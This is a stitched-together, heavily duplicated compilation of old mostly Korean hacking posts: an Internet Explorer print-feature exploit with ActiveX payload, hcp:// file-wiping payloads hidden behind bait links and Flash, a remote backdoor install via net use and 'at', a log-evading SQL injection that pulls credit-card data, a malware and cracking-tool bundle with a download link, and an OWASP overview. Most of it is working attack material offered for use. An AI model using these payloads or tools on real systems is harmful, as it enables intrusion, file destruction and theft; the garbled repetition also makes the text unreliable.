Whenever a user prints a page, Internet Explorer uses a local resource
script which generates an new HTML to be printed. This HTML consists of
the following elements: Header, webpage body, Footer, and if enabled,
also the table of links in the webpage.
While the script takes only the text within the link’s inner data, it
does not validate the URL of links, and add it to the HTML as it is.
This allows to inject a script that will be executed when the new HTML
will be generated.
As I said in a previous post, most of the local resources in Internet
Explorer are now running in Internet Zone. Unfortunately, the printing
local resource script is running in Local Machine Zone, which means that
any injected script can execute arbitrary code on the user’s machine.
Proof of Concept
The following is an example of a URL which executes Windows Calculator:
http://www.google.com/?q=<script defer>new ActiveXObject(“Wscript.Shell”).run(“calc”)</script>
-->
<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>
# milw0rm.com [2008-05-14]
Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
Author: Aviv Raff
http://aviv.raffon.net/
Summary
Internet Explorer is prone to a Cross-Zone Scripting vulnerability in
its “Print Table of Links” feature. This feature allows users to add to
a printed web page an appendix which contains a table of all the links
in that webpage.
An attacker can easily add a specially crafted link to a webpage (e.g.
at his own website, comments in blogs, social networks, Wikipedia,
etc.), so whenever a user will print this webpage with this feature
enabled, the attacker will be able to run arbitrary code on the user’s
machine (i.e. in order to take control over the machine).
Affected version
Internet Explorer 7.0 and 8.0b on a fully patched Windows XP.
Windows Vista with UAC enabled is partially affected (Information Leakage only).
Earlier versions of Internet Explorer may also be affected.
Technical details
Whenever a user prints a page, Internet Explorer uses a local resource
script which generates an new HTML to be printed. This HTML consists of
the following elements: Header, webpage body, Footer, and if enabled,
also the table of links in the webpage.
While the script takes only the text within the link’s inner data, it
does not validate the URL of links, and add it to the HTML as it is.
This allows to inject a script that will be executed when the new HTML
will be generated.
As I said in a previous post, most of the local resources in Internet
Explorer are now running in Internet Zone. Unfortunately, the printing
local resource script is running in Local Machine Zone, which means that
any injected script can execute arbitrary code on the user’s machine.
Proof of Concept
The following is an example of a URL which executes Windows Calculator:
http://www.google.com/?q=<script defer>new ActiveXObject(“Wscript.Shell”).run(“calc”)</script>
-->
<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>
# milw0rm.com [2008-05-14]
윈도우 XP의 버그를 이용한 사용자 시스템 파괴에서 자기 보호하기
마소가 버그 자체를 인정하고 있지 않으므로 이러한 버그를 유포해도 해결책이 존재 하
지 않습니다.
먼저 버그 조차도 있는지 없는지 모르시는 분들을 위해서 자기 XP 시스템을 점검할 수
있는 방법부터 설명합니다.
일단 c:/test 폴더를 만들고 지워져도 되는 파일을 몇개 가져다 놓습니다.
그리고 익스플로러 주소에 다음과 같이 입력합니다.
hcp://system/DFS/uplddrvinfo.htm?file://c:test*
그러면 헬프센터(도움말)이 뜨고 test 폴더아래의 파일은 홀랑 지워집니다.
c: 루트도 지워지고 다 지워집니다. 대신 시스템 파일은 지워졌다가 복구됩니다.
만일 해커가 html 파일에 meta 태그를 이용하여 간단히 xp 사용자의 폴더하나를 날려버
릴 수 있습니다.
<META HTTP-EQUIV=REFRESH CONTENT= "1;
URL=hcp://system/DFS/uplddrvinfo.htm?file://c:test*">
메타태그로 1초후에 폴더 날리는 도움말 띄우도록 해버리는 겁니다.
또는
<a href="hcp://system/DFS/uplddrvinfo.htm?file://c:test*">성인 동영상</a>
야한 유혹이나 야한 사진 링크로 클릭하게 만들수도 있습니다.
플래시 파일을 이용하여 1프레임에다가
getURL("hcp://system/DFS/uplddrvinfo.htm?file://c:a*")
getURL("hcp://system/DFS/uplddrvinfo.htm?file://c:b*")
getURL("hcp://system/DFS/uplddrvinfo.htm?file://c:c*")
...
이렇게 해 놓으면 그 폴더들 몽창 날라가 버림니다.
만일 해커들이 야한 플래시 게임이라고 게시판에 이런 플래시 파일을 마구 올리거나 메
일로 html 페이지, 플래시 파일을 마구 보내면 그 중에 XP 사용자들 시스템 홀랑 말아
먹어버리는 겁니다.
시스템 파일은 보호가 되지만 일반 파일들은 몽창 다 지워져 버림니다.
공통으로 사용하는 프로그램들은 존재합니다. 그 프로그램들이 자료를 저장하는 폴더
를 겨냥하거나 설치된 경로를 겨냥하거나, 자료저장하는 폴더이름을 유추해서 이런 시
스템 파괴를 하면 어떻게 되겠습니까?
시스템 자체는 살아있지만 중요한 파일들 몽창 날리는 겁니다.
회사에서 캐드자료 열라 저장했는데 플래시 파일이 캐드버전별로 저장하는 폴더를 겨냥
해서 폴더내부 파일들 확 다 지워버리면 회사 망할 수도 있습니다.
마소는 인정조차 하지 않고 있으며 영문판 서비스팩에서 소리없이 수정했습니다. 각 나
라 버전의 서비스 팩이 나오면 고쳐지겠죠. 그러나 서비스팩 설치 안하고 쓰는 사람들
이 훨씬 더 많고 아직 서비스 팩나온지 몇일 안됬습니다.
이 상황에서 전 세계 XP 사용자들 대부분이 이 시스템 파괴에 노출이 되어 있는 것입니
다.
해결방법은 아래와 같습니다.
***해결방법***
1. 아래의 파일을 삭제하거나 이름을 바꾼다.
C:WINDOWSPCHEALTHHELPCTRSystemDFSuplddrvinfo.htm
- 원인이 되는 파일입니다. 도움말이 이 파일을 이용하면서 이러한 치명적인 결함을 노
출하고 있습니다.
2. 해당 파일에서 아래 코드를 찾아 삭제또는 수정한다.
var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );
try
{
oFSO.DeleteFile( sFile );
}
이 부분을 찾아서 삭제하거나 아래와 같이 파일을 삭제하는 동작을 할 수 없도록 수정해
야 합니다.
var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );
try
{
/***oFSO.DeleteFile( sFile );***/
}
이 내용을 보는 즉시 자신의 XP 시스템을 점검하고 문제를 해결하셔야 합니다.
호기심이 발동하더라도 위와 같은 HTML 파일이나 플래시 파일 만들어서 배포하면 바
로 해커되버리는 것이니 하셔서는 안됩니다.
자기 시스템 보호하라고 올리는 글입니다.
/*
모든 업데이트가 되있는 제 시스템에서는 지워지지 않았는데
다른분들 테스트 해보시고 이상이 있으면 코멘트 달아주세요
*/
마소가 버그 자체를 인정하고 있지 않으므로 이러한 버그를 유포해도 해결책이 존재 하
지 않습니다.
먼저 버그 조차도 있는지 없는지 모르시는 분들을 위해서 자기 XP 시스템을 점검할 수
있는 방법부터 설명합니다.
일단 c:/test 폴더를 만들고 지워져도 되는 파일을 몇개 가져다 놓습니다.
그리고 익스플로러 주소에 다음과 같이 입력합니다.
hcp://system/DFS/uplddrvinfo.htm?file://c:test*
그러면 헬프센터(도움말)이 뜨고 test 폴더아래의 파일은 홀랑 지워집니다.
c: 루트도 지워지고 다 지워집니다. 대신 시스템 파일은 지워졌다가 복구됩니다.
만일 해커가 html 파일에 meta 태그를 이용하여 간단히 xp 사용자의 폴더하나를 날려버
릴 수 있습니다.
<META HTTP-EQUIV=REFRESH CONTENT= "1;
URL=hcp://system/DFS/uplddrvinfo.htm?file://c:test*">
메타태그로 1초후에 폴더 날리는 도움말 띄우도록 해버리는 겁니다.
또는
<a href="hcp://system/DFS/uplddrvinfo.htm?file://c:test*">성인 동영상</a>
야한 유혹이나 야한 사진 링크로 클릭하게 만들수도 있습니다.
플래시 파일을 이용하여 1프레임에다가
getURL("hcp://system/DFS/uplddrvinfo.htm?file://c:a*")
getURL("hcp://system/DFS/uplddrvinfo.htm?file://c:b*")
getURL("hcp://system/DFS/uplddrvinfo.htm?file://c:c*")
...
이렇게 해 놓으면 그 폴더들 몽창 날라가 버림니다.
만일 해커들이 야한 플래시 게임이라고 게시판에 이런 플래시 파일을 마구 올리거나 메
일로 html 페이지, 플래시 파일을 마구 보내면 그 중에 XP 사용자들 시스템 홀랑 말아
먹어버리는 겁니다.
시스템 파일은 보호가 되지만 일반 파일들은 몽창 다 지워져 버림니다.
공통으로 사용하는 프로그램들은 존재합니다. 그 프로그램들이 자료를 저장하는 폴더
를 겨냥하거나 설치된 경로를 겨냥하거나, 자료저장하는 폴더이름을 유추해서 이런 시
스템 파괴를 하면 어떻게 되겠습니까?
시스템 자체는 살아있지만 중요한 파일들 몽창 날리는 겁니다.
회사에서 캐드자료 열라 저장했는데 플래시 파일이 캐드버전별로 저장하는 폴더를 겨냥
해서 폴더내부 파일들 확 다 지워버리면 회사 망할 수도 있습니다.
마소는 인정조차 하지 않고 있으며 영문판 서비스팩에서 소리없이 수정했습니다. 각 나
라 버전의 서비스 팩이 나오면 고쳐지겠죠. 그러나 서비스팩 설치 안하고 쓰는 사람들
이 훨씬 더 많고 아직 서비스 팩나온지 몇일 안됬습니다.
이 상황에서 전 세계 XP 사용자들 대부분이 이 시스템 파괴에 노출이 되어 있는 것입니
다.
해결방법은 아래와 같습니다.
***해결방법***
1. 아래의 파일을 삭제하거나 이름을 바꾼다.
C:WINDOWSPCHEALTHHELPCTRSystemDFSuplddrvinfo.htm
- 원인이 되는 파일입니다. 도움말이 이 파일을 이용하면서 이러한 치명적인 결함을 노
출하고 있습니다.
2. 해당 파일에서 아래 코드를 찾아 삭제또는 수정한다.
var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );
try
{
oFSO.DeleteFile( sFile );
}
이 부분을 찾아서 삭제하거나 아래와 같이 파일을 삭제하는 동작을 할 수 없도록 수정해
야 합니다.
var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );
try
{
/***oFSO.DeleteFile( sFile );***/
}
이 내용을 보는 즉시 자신의 XP 시스템을 점검하고 문제를 해결하셔야 합니다.
호기심이 발동하더라도 위와 같은 HTML 파일이나 플래시 파일 만들어서 배포하면 바
로 해커되버리는 것이니 하셔서는 안됩니다.
자기 시스템 보호하라고 올리는 글입니다.
/*
모든 업데이트가 되있는 제 시스템에서는 지워지지 않았는데
다른분들 테스트 해보시고 이상이 있으면 코멘트 달아주세요
*/
리모트에서 명령어 실행시키기
전제조건은 이미 명령을 실행시키려는 서버의 계정이있어야하고 목표 서버는 Netbios 서비스가 실행되어야합니다.
먼저 타켓컴퓨터와 연결을 합니다.
C:net use \targetipc$ “Password” /user:UserName
실행시키려는 프로그램을 타겟서버에 복사해넣습니다.
C:copy D:toolsncx99.exe \targetc$system32
타켓서버의 schedule 서비스를 열어놓습니다.
C:netsvc schedule \target /star
여기서 윈도우2000 이상부터는 디폴트로 스케쥴서비스가 열렸기에 이 작업이 필요없습니다.
타켓서버의 시간을 알아냅니다.
C:net time \target
\target의 현재 시간은 2003-12-13 오후 2:22입니다
명령어를 스케쥴에 등록합니다.
C:at \target 2:24pm ncx99.exe
시간을 다시 확인합니다.
C:net time \target
\target의 현재 시간은 2003-12-13 오후 2:24입니다
연결
C:telnet target 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
전제조건은 이미 명령을 실행시키려는 서버의 계정이있어야하고 목표 서버는 Netbios 서비스가 실행되어야합니다.
먼저 타켓컴퓨터와 연결을 합니다.
C:net use \targetipc$ “Password” /user:UserName
실행시키려는 프로그램을 타겟서버에 복사해넣습니다.
C:copy D:toolsncx99.exe \targetc$system32
타켓서버의 schedule 서비스를 열어놓습니다.
C:netsvc schedule \target /star
여기서 윈도우2000 이상부터는 디폴트로 스케쥴서비스가 열렸기에 이 작업이 필요없습니다.
타켓서버의 시간을 알아냅니다.
C:net time \target
\target의 현재 시간은 2003-12-13 오후 2:22입니다
명령어를 스케쥴에 등록합니다.
C:at \target 2:24pm ncx99.exe
시간을 다시 확인합니다.
C:net time \target
\target의 현재 시간은 2003-12-13 오후 2:24입니다
연결
C:telnet target 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
요즘 해킹의 화두는 바로 SQL에 있다. 예전에는 OS 자체에 대해 연구를 해서 버그/익스플로잇을 찾아 내어 작업하곤 했다.
하지만, 어느 때부터인가 Php부터 해서 asp에 이르기 까지 웹 서비스의 취약점에 대해 논의가 이루어지고,
드뎌 지금에서는 SQL과 같은 서비스들이 수난을 당하고 있다.
우리의 멋장이 종량씨가 SQL Injection에 대한 자료를 분석했지만,
아쉽게도 IIS 로그에 그러한 작업을 남기지 않게 하는 방법이 있어 소개한다.
대부분 이 글을 보면 아항~ 하고 알 수 있을 것이다.
telnet을 이용하여 서버를 웹브라우저가 아닌 텍스트로 덤벼보자.
Normal Request
GET /?id=80
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: TestServer
로그파일을 보면.
2005-08-10 16:35:32 172.16.10.3 - 172.16.10.111 80 GET /Default.asp id=80 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
거의 대충 보면 알수 있다. 걍 홈페이지 연거다.
문제는 /?id=80 여기 부분에 있다. 여기에다가 노가다작업을 함 해보자.
GET /?id=<알파벳 A를 4095번 입력>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: TestServer
Logged Response (IIS 5.0 with default logging)
2005-08-10 17:21:29 172.16.10.3 - 172.16.10.111 80 GET /Default.asp ... 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
Logged Response (IIS 6.0 with default logging)
2005-08-10 17:09:54 172.16.10.116 GET /Default.asp ... 80 - 172.16.10.3 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) 200 0 0
그렇다. 바로 압축 아니 함축의 의미인 ... 으로 변신한다.
4096바이트의 버퍼를 초과하게 되면, 로그 기능도 초과(?)한다.
그러면 어떻게 SQL Injection 공격을 할까 ?
당연히 다음과 같이 한다. 그러면 로그에는 아무것두 없다.
GET /?test=<알파벳 A를 4095번 입력>&id=1'+UNION+ALL+SELECT+Names,Address,OrderId,CreditCard+FROM+Orders+where+'1'='1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
그렇다면, 이를 막는 방법은 뭘까? 우리가 애용하는 URLScan을 통해
버퍼의 크기를 제한하여 막을 수 있다.
MaxQueryString=2048
다 알테구... 흠. 할말 없다.
누가 좋은 사이트좀 갈쳐줘여. 나도 함 공격좀 해보게.
그럼.
참고사이트 : http://www.webappsec.org/projects/articles/082905.shtml
하지만, 어느 때부터인가 Php부터 해서 asp에 이르기 까지 웹 서비스의 취약점에 대해 논의가 이루어지고,
드뎌 지금에서는 SQL과 같은 서비스들이 수난을 당하고 있다.
우리의 멋장이 종량씨가 SQL Injection에 대한 자료를 분석했지만,
아쉽게도 IIS 로그에 그러한 작업을 남기지 않게 하는 방법이 있어 소개한다.
대부분 이 글을 보면 아항~ 하고 알 수 있을 것이다.
telnet을 이용하여 서버를 웹브라우저가 아닌 텍스트로 덤벼보자.
Normal Request
GET /?id=80
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: TestServer
로그파일을 보면.
2005-08-10 16:35:32 172.16.10.3 - 172.16.10.111 80 GET /Default.asp id=80 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
거의 대충 보면 알수 있다. 걍 홈페이지 연거다.
문제는 /?id=80 여기 부분에 있다. 여기에다가 노가다작업을 함 해보자.
GET /?id=<알파벳 A를 4095번 입력>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: TestServer
Logged Response (IIS 5.0 with default logging)
2005-08-10 17:21:29 172.16.10.3 - 172.16.10.111 80 GET /Default.asp ... 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
Logged Response (IIS 6.0 with default logging)
2005-08-10 17:09:54 172.16.10.116 GET /Default.asp ... 80 - 172.16.10.3 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) 200 0 0
그렇다. 바로 압축 아니 함축의 의미인 ... 으로 변신한다.
4096바이트의 버퍼를 초과하게 되면, 로그 기능도 초과(?)한다.
그러면 어떻게 SQL Injection 공격을 할까 ?
당연히 다음과 같이 한다. 그러면 로그에는 아무것두 없다.
GET /?test=<알파벳 A를 4095번 입력>&id=1'+UNION+ALL+SELECT+Names,Address,OrderId,CreditCard+FROM+Orders+where+'1'='1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
그렇다면, 이를 막는 방법은 뭘까? 우리가 애용하는 URLScan을 통해
버퍼의 크기를 제한하여 막을 수 있다.
MaxQueryString=2048
다 알테구... 흠. 할말 없다.
누가 좋은 사이트좀 갈쳐줘여. 나도 함 공격좀 해보게.
그럼.
참고사이트 : http://www.webappsec.org/projects/articles/082905.shtml
FTP의 보안 취약점 IRC Lecture
Lecture Log
May 18th 2002
Write : By Vegas
번역 : By Zenky(zenky77@hananet.net)
Lecture Log
May 18th 2002
Write : By Vegas
번역 : By Zenky(zenky77@hananet.net)
FTPcodes_1.0.2.pdf
통상적으로 해킹 툴 90%는 백신에서 바이러스로 인식합니다.
G4RAIO.UH2K8G4R.rarIncludes :
- AddrView.rar
- AnonFTP.zip
- AOL new.rar
- AppToService.rar
- arpinject.zip
- aspack21.zip
- Astaroth Joiner v2.rar
- atk-2.1.zip
- BankOfAmerica.rar
- bios_pass_remover.zip
- BlasterW32.zip
- blue.zip
- bmpripper.zip
- brutus.zip
- Cable Modem Sniffer.rar
- CapKeys_DIGITAL.rar
- CASXM138.zip
- CAYZODQF.zip
- CGI Founder v1.043.zip
- cgis4.zip
- CGISscan.zip
- cia10.zip
- cports.rar
- craagle.zip
- Crackftp.zip
- CreditCardGjenerator.rar
- Davs_TR_REtail.zip
- DDL Sites.rar
- DeepUnFreez.zip
- DrVBS.zip
- eBay.rar
- EESBinder.zip
- egold.rar
- E-mail Cracker.rar
- ezDataBase_Defacer.rar
- F.B.I - Binder.rar
- FTP Brute Forcer.rar
- ftpbr.zip
- ~Censored~ Mail Bomber 2.3.rar
- G00B3RS_phpBB_exploit_pack.rar
- genxe-beta-0.9.0.zip
- Google_Hacker_1.2.rar
- grinder1.1.zip
- Hack FLASH Template.zip
- Hack MY Space.zip
- Hack Photoshop CS2.zip
- HackersAssistant.zip
- HackTheGame.zip
- hck.zip
- hlboom.zip.zip
- Hook Tool Box.rar
- Hotmail Email Hacker.rar
- Hotmail HAcker Gold.rar
- Hotmail ScamPage.zip
- HotmailHack.rar
- HSBC-US.rar
- hydra-4.6-win.zip
- iecv.rar
- IP2.rar
- ipnetinfo.rar
- john-17w.zip
- Key Changer.rar
- Key_Logger.zip
- Legion NetBios Scanner v2.1.zip
- Mail Boomb_2.0 YAHOO.zip
- MIDNITEmassacre.zip
- MooreR Port Scanner.rar
- MSN Flooder 2.0.rar
- MSN Messenger Account Cracker v2.0.rar
- MSNLoader.rar
- NET BIOS Scaner.rar
- NetBIOS Name Scanner.rar
- NetResView.rar
- NFO Maker 1.0.zip
- Nimda.zip
- nkedb.zip
- nolimitcracker.rar
- NTPacker.zip
- nts.zip
- NullAddFrontend.zip
- On-Off MSN.rar
- OS Update Hack.rar
- P0kes WormGen 2.0.zip
- panther.zip
- PayPal.rar
- PCAnyPass.rar
- Php Nuke Hacker v11.0.rar
- phpBB Annihilator.rar
- phpbb attack.rar
- phpbb bruteforcer.rar
- PhpBB pass extractor.zip
- phpBB_DoS.rar
- phpbb_spammer.rar
- phpBBAttacker.rar
- phpBBAttacker.zip
- phpBBcracker.rar
- PhpBuGScan.rar
- PHPfucker.rar
- PhpNuke_bypass.rar
- Ping & Nukes.rar
- Port Listener XP.rar
- pqwak2.zip
- procexp.rar
- ProMo.rar
- ProxyPro.zip
- Pure phpBB Email harvester.rar
- rainbowcrack-1.2-src win-lin.zip
- Remote Shut Down.rar
- ResHacker.zip
- Rocket.zip
- rpc.zip
- RpcScan101.zip
- Sasser.zip
- SendMailer.zip
- Server 2003 Keygen.rar
- Server Killer.rar
- showpassv10.zip
- sitedigger2.zip
- smbat-win32bin-1.0.4.zip
- SMBdie.zip
- smbproxy-win32bin-1.0.0.zip
- Source Checker.rar
- source codes.rar
- sprut.zip
- SQLScan v1.0.rar
- Stealth - HTTP Scanner v1.0 build 23.zip
- super.zip
- SuperScan4.rar
- tftpd32.273.zip
- thunter.zip
- TinaSoft KILL.zip
- traceroute.rar
- UC.Forum Spam.rar
- udpflood.zip
- Ultra Dos.zip
- USBank.rar
- Visa Spam.zip
- Warez Sites.rar
- Web Cracker 2.0.rar
- WebCracker 4.0.rar
- whoistd.rar
- Win XP Activator.rar
- WindowHide.rar
- Windows XP Corperate Keygen.rar
- Windows XP KeyGen.rar
- Windows XP Product Key Changer.rar
- Windows XP Product Key Checker.rar
- Windows XP Product Key Viewer.rar
- WindowsAdminpasswordHack.rar
- wwwhack.rar
- xpass.zip
- xplizer.rar
- Yahoo Password.zip
- yahooUltraCracker.rar
- zehir.zip
다운로드 링크
http://rs246.rapidshare.com/files/80932465/G4RAIO.UH2K8G4R_www.softarchive.net.rar
원본 출처 : http://wi-fi-netz.blogspot.com/
최근 웹 애플리케이션 공격이 급증하면서 웹 방화벽과 웹 취약점에 대한 관심이 커지고 있습니다.
OWASP 10 대 위협과 국정원 8대 취약성을 인지하고 있다면, 웹 방화벽이나 취약점분석 서비스를 선택하는데에 도움이 될 것이라 생각됩니다.
OWASP 10 대 위협과 국정원 8대 취약성을 인지하고 있다면, 웹 방화벽이나 취약점분석 서비스를 선택하는데에 도움이 될 것이라 생각됩니다.
1. OWASP 10대 위협!!
2. 국정원 8대 홈페이지 취약성
1. 입력값 검증 부재
웹 애플리케이션 서비스를 요청하기 위해 애플리케이션에 데이터를 전송할 때 HTTP를 통해 URL, 쿼리(Query), 헤더(Header), 쿠키(Cookie), HTML 폼에 대한 정보를 전송한다. 이때 이 데이터 값을 악의적으로 변경해 시스템에 피해를 가할 수 있다.
2. 취약한 접근 통제
가장 심각한 위협은 외부에서 관리자의 접근을 허용하는 것으로 루트 권한이나, 시스템 환경 구성 관리 권한을 제공하면 이 통로를 통해 전 시스템에 대한 접근이 허용될 수 있다.
3. 취약한 인증 및 세션 관리
인증 관련 정보를 제어하는 프로그램에 대한 통제는 상대적으로 느슨하다. 세센에 실려 다니는 정보가 유츌되 위협이 발생할 수도 있다.
4. 크로스 사이트 스크립트
특정 사이트에서 사용자가 정보를 받을 때 그 정보 내에 악의적인 코드를 숨겨놓아 이를 클라이언트에서 실행되도록 하는 기법이다.
5. 버퍼 오버플로우
웹 서버, 웹 애플리케이션 서버에 대한 공격 유형이다. 웹 애플리케이션 자체의 버퍼 오버플로우에 대한 공격 유형과 비슷하다.
6. 삽입 취약점
삽입 취약점은 웹 애플리케이션이 자체 로직을 이용해 외부의 모듈을 호출하는 것이다.
7. 부적절한 에러처리
애플리케이션 실행 도중 에러가 발생한 경우에 해당 에러의 내용을 직접 사용자 화면에 보여주는 경우가 있다. 이 정보가 자바 익스프레션 덤프(Exception Dump)라면 사용자는 애플리케이션이 어떤 계층 구조로 이뤄져 있고 어디에서 어떤 문제가 발생하는지 알 수 있으며 이를 통해 시스템에 대한 공격을 할 수 있다.
8. 취약한 정보저장 방식
웹 애플리케이션이 데이터베이스나 파일 시스템이 민감한 정보를 저장할 필요가 있다. 이들 정보는 외부에서 접근이 허용되지 않는 내부 망에 저장되는 경우가 대부분이지만 웹 서버에 저장돼 외부 취약점이 발생하기도 한다.
9. 서비스 방해공격
서비스 방해 공격은 웹 애플리케이션의 취약점을 이용해 해당 애플리케이션이 서비스 중단 상태로 가도록 하는 것이다.
10. 부적절한 환경 설정
서버 환경 설정에서 일반적으로 일어나는 유형은 운영팀에서 적절한 보안 패치를 하지 않았을때 발생한다.
웹 애플리케이션 서비스를 요청하기 위해 애플리케이션에 데이터를 전송할 때 HTTP를 통해 URL, 쿼리(Query), 헤더(Header), 쿠키(Cookie), HTML 폼에 대한 정보를 전송한다. 이때 이 데이터 값을 악의적으로 변경해 시스템에 피해를 가할 수 있다.
2. 취약한 접근 통제
가장 심각한 위협은 외부에서 관리자의 접근을 허용하는 것으로 루트 권한이나, 시스템 환경 구성 관리 권한을 제공하면 이 통로를 통해 전 시스템에 대한 접근이 허용될 수 있다.
3. 취약한 인증 및 세션 관리
인증 관련 정보를 제어하는 프로그램에 대한 통제는 상대적으로 느슨하다. 세센에 실려 다니는 정보가 유츌되 위협이 발생할 수도 있다.
4. 크로스 사이트 스크립트
특정 사이트에서 사용자가 정보를 받을 때 그 정보 내에 악의적인 코드를 숨겨놓아 이를 클라이언트에서 실행되도록 하는 기법이다.
5. 버퍼 오버플로우
웹 서버, 웹 애플리케이션 서버에 대한 공격 유형이다. 웹 애플리케이션 자체의 버퍼 오버플로우에 대한 공격 유형과 비슷하다.
6. 삽입 취약점
삽입 취약점은 웹 애플리케이션이 자체 로직을 이용해 외부의 모듈을 호출하는 것이다.
7. 부적절한 에러처리
애플리케이션 실행 도중 에러가 발생한 경우에 해당 에러의 내용을 직접 사용자 화면에 보여주는 경우가 있다. 이 정보가 자바 익스프레션 덤프(Exception Dump)라면 사용자는 애플리케이션이 어떤 계층 구조로 이뤄져 있고 어디에서 어떤 문제가 발생하는지 알 수 있으며 이를 통해 시스템에 대한 공격을 할 수 있다.
8. 취약한 정보저장 방식
웹 애플리케이션이 데이터베이스나 파일 시스템이 민감한 정보를 저장할 필요가 있다. 이들 정보는 외부에서 접근이 허용되지 않는 내부 망에 저장되는 경우가 대부분이지만 웹 서버에 저장돼 외부 취약점이 발생하기도 한다.
9. 서비스 방해공격
서비스 방해 공격은 웹 애플리케이션의 취약점을 이용해 해당 애플리케이션이 서비스 중단 상태로 가도록 하는 것이다.
10. 부적절한 환경 설정
서버 환경 설정에서 일반적으로 일어나는 유형은 운영팀에서 적절한 보안 패치를 하지 않았을때 발생한다.
2. 국정원 8대 홈페이지 취약성
2005년 국가사이버안전센터(NCSC)에서 국내 각 기관에서 홈페이지 해킹에 많이 악용되었던 보안취약점 8종을 선정하고 발표하였다.
1. 디렉토리 리스팅 취약점
2. 파일 다운로드 취약점
게시판 등에 저장된 자료에 대해 ‘다운로드 스크립트’를 이용하여 다운로드 기능을 제공하면서, 대상 자료파일의 위치 지정에 제한조건을 부여하지 않았을 경우에 URL칸의 다운로드 스크립트의 인수 값에 ‘../’문자열 등을 입력하여 시스템 디렉토리 등에 있는 /etc/passwd와 같은 비공개 자료들이 유출될 수 있다.
3. 크로스사이트 스크립트 취약점
게시판에 새 게시물을 작성하여 등록할 때와 같이 사용자의 입력을 받아 처리하는 웹 응용프로그램에서 입력 내용에 대해 실행코드인 스크립트의 태그를 적절히 필터링하지 않을 경우에 악의적인 스크립트가 포함된 게시물을 등록할 수 있어 해당 게시물을 열람하는 일반 사용자의 pc로 부터 개인정보인 쿠키를 유출할 수 있는 등의 피해를 초래할 수 있다.
4. 파일 업로드 취약점
첨부파일 업로드를 허용하는 홈페이지 게시판에서 .php, .jsp등의 확장자 이름의 스크립트 파일의 업로드를 허용할 경우에 해커가 악성 실행 프로그램을 업로드한 후에 홈페이지 접속방식으로 원격에서 서버컴퓨터의 시스템 운영 명령어를 실행 시킬 수 있다.
6. 테크노트(Technote) 취약점
‘테크노트’의 일부 CGI프로그램들에서 인수 값 처리시에 ‘ㅣ’문자 이후에 나오는 컴퓨터 운영 명령어가 실행될 수 있는 결함이 있어 해커는 홈페이지접속 방식으로 컴퓨터 명령어를 실행하여 화면을 변조하거나 컴퓨터를 조작할 수 있다.
- Linux 및 Unix계열의 컴퓨터에 주로 사용
- Windows 계열에서 ‘Perl’이 지원될 경우 사용
7. 제로보드(Zeroboard) 취약점
- ‘제로보드’의 일부 php프로그램이 원격에 있는 php파일을 실행할 수 있는 결함이 있어 해커는 홈페이지 접속 방식으로 컴퓨터 명령어를 실행하여 화면을 변조하거나 컴퓨터를 조작할 수 있다.
- Linux 및 Unix 계열의 컴퓨터에 주로 사용
- Windows 계열에서 ‘php’가 지원될 경우 사용
8. SQL Injection 취약점
웹 브라우저 주소 창 또는 사용자 ID 및 패스워드 입력화면에서 데이터베이스 SQL문에 사용되는 문자기호(‘ 및”)의 입력을 적절히 필터링 하지 않은 경우에 해커가 SQL 문으로 해석될 수 있도록 조작한 입력으로
데이터베이스를 인증 절차 없이 접근, 자료를 무단 유출하거나 변조할 수 있다.
1. 디렉토리 리스팅 취약점
홈페이지의 속성을 설정하는 “웹사이트 등록정보”에 특정 디렉토리에 대하여
- IIS 웹 서버 : ‘디렉토리 검색’ 항목이 체크
- Apache 웹 서버 : ‘httpd.conf 파일’에서 ‘Indexes’옵션이 On
되어 있는 경우에 인터넷 사용자에게 모든 디렉토리 및 파일 목록이 보여지게 되고, 파일의 열람 및 저장도 가능하게 되어 비공개 자료가 유출될 수 있다.
- IIS 웹 서버 : ‘디렉토리 검색’ 항목이 체크
- Apache 웹 서버 : ‘httpd.conf 파일’에서 ‘Indexes’옵션이 On
되어 있는 경우에 인터넷 사용자에게 모든 디렉토리 및 파일 목록이 보여지게 되고, 파일의 열람 및 저장도 가능하게 되어 비공개 자료가 유출될 수 있다.
2. 파일 다운로드 취약점
게시판 등에 저장된 자료에 대해 ‘다운로드 스크립트’를 이용하여 다운로드 기능을 제공하면서, 대상 자료파일의 위치 지정에 제한조건을 부여하지 않았을 경우에 URL칸의 다운로드 스크립트의 인수 값에 ‘../’문자열 등을 입력하여 시스템 디렉토리 등에 있는 /etc/passwd와 같은 비공개 자료들이 유출될 수 있다.
3. 크로스사이트 스크립트 취약점
